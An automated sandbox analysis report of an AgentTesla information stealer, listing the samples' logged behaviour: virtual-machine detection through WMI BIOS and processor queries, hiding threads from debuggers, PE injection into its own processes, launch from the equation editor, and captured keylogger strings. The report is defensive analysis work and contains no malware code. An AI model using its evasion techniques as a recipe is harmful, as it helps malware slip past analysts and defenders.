Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\twox67345.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Source: C:\Users\user\AppData\Roaming\twox67345.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\twox67345.exe	Window / User API: threadDelayed 7353
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Window / User API: threadDelayed 2687

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2380	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Roaming\twox67345.exe TID: 2844	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\twox67345.exe TID: 2808	Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Roaming\twox67345.exe TID: 1924	Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Users\user\AppData\Roaming\twox67345.exe TID: 1928	Thread sleep count: 7353 > 30
Source: C:\Users\user\AppData\Roaming\twox67345.exe TID: 1928	Thread sleep count: 234 > 30
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe TID: 1408	Thread sleep time: -480000s >= -30000s
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe TID: 1464	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe TID: 2144	Thread sleep count: 2687 > 30
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe TID: 1880	Thread sleep count: 130 > 30

Source: C:\Users\user\AppData\Roaming\twox67345.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\twox67345.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\twox67345.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Last function: Thread delayed

Source: UGxXf.exe, 0000000B.00000002.2329868830.00000000006EA000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Users\user\AppData\Roaming\twox67345.exe

Process information queried: ProcessInformation

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\AppData\Roaming\twox67345.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Roaming\twox67345.exe

Code function: 9_2_00617128 LdrInitializeThunk,LdrInitializeThunk,

Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\twox67345.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\twox67345.exe	Memory written: C:\Users\user\AppData\Roaming\twox67345.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Memory written: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe base: 400000 value starts with: 4D5A

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Process created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Process created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1

Source: twox67345.exe, 00000009.00000002.2360354823.0000000002835000.00000004.00000001.sdmp	Binary or memory string: <br><font color="#008000"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(02/23/2021 17:04:17)</font></font><br><font color="#008000">{Win}</font>r
Source: twox67345.exe, 00000009.00000002.2360354823.0000000002835000.00000004.00000001.sdmp	Binary or memory string: Program Manager48
Source: twox67345.exe, 00000009.00000002.2359872693.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: twox67345.exe, 00000009.00000002.2360354823.0000000002835000.00000004.00000001.sdmp	Binary or memory string: my<br><font color="#008000"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(02/23/2021 17:04:17)</font></font><br>\|
Source: twox67345.exe, 00000009.00000002.2359872693.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: twox67345.exe, 00000009.00000002.2360374294.000000000283C000.00000004.00000001.sdmp	Binary or memory string: Time: 02/23/2021 16:55:48<br>User Name: user<br>Computer Name: 642294<br>OSFullName: Microsoft Windows 7 Professional <br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><br><font color="#008000"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(02/23/2021 17:04:17)</font></font><br><font color="#008000">{Win}</font>r
Source: twox67345.exe, 00000009.00000002.2360354823.0000000002835000.00000004.00000001.sdmp	Binary or memory string: <br><font color="#008000"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(02/23/2021 17:04:17)</font></font><br><font color="#008000">{Win}</font>
Source: twox67345.exe, 00000009.00000002.2359872693.0000000000E80000.00000002.00000001.sdmp	Binary or memory string: !Progman
Source: twox67345.exe, 00000009.00000002.2360374294.000000000283C000.00000004.00000001.sdmp	Binary or memory string: Time: 02/23/2021 16:55:48<br>User Name: user<br>Computer Name: 642294<br>OSFullName: Microsoft Windows 7 Professional <br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br><hr><br><font color="#008000"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(02/23/2021 17:04:17)</font></font><br><font color="#008000">{Win}</font>r\

Language, Device and Operating System Detection:

Source: C:\Users\user\AppData\Roaming\twox67345.exe	Queries volume information: C:\Users\user\AppData\Roaming\twox67345.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Queries volume information: C:\Users\user\AppData\Roaming\twox67345.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\twox67345.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Queries volume information: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Queries volume information: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Queries volume information: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation

Source: C:\Users\user\AppData\Roaming\twox67345.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2274734212.000000000368E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2360028702.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2358876665.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2358961317.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2334670047.000000000374E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UGxXf.exe PID: 2500, type: MEMORY
